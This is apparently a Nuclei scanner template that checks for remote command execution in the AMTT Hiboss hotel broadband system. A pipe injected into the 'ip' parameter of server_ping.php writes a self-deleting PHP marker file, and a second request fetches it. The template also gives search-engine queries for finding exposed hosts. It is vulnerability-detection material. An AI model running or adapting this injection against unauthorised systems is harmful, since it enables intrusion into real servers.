id: amtt-hiboss-server-ping-rce

info:
  name: 安美数字酒店宽带运营系统server ping远程命令执行
  author: SleepingBag945
  severity: critical
  description: |-
    FOFA: title=酒店宽带运营系统
    ZoomEye: app:"安美数字酒店宽带运营系统"
  reference:
    - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/amtt-hiboss-server-ping-rce.yaml
  tags: amtt,hiboss,rce

http:
  - raw:
      - |
        GET /manager/radius/server_ping.php?ip=127.0.0.1|echo%20"<?php%20echo%20%27{{randstr}}%27;unlink(__FILE__);?>">../../{{randstr_2}}.php&id=1 HTTP/1.1
        Host: {{Hostname}}
      
      - |
        GET /{{randstr_2}}.php HTTP/1.1
        Host: {{Hostname}}

    stop-at-first-match: true
    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - status_code_1==200 && contains(body_1,"parent.doTestResult")
          - status_code_2==200 && contains(body_2,"{{randstr}}")
        condition: and
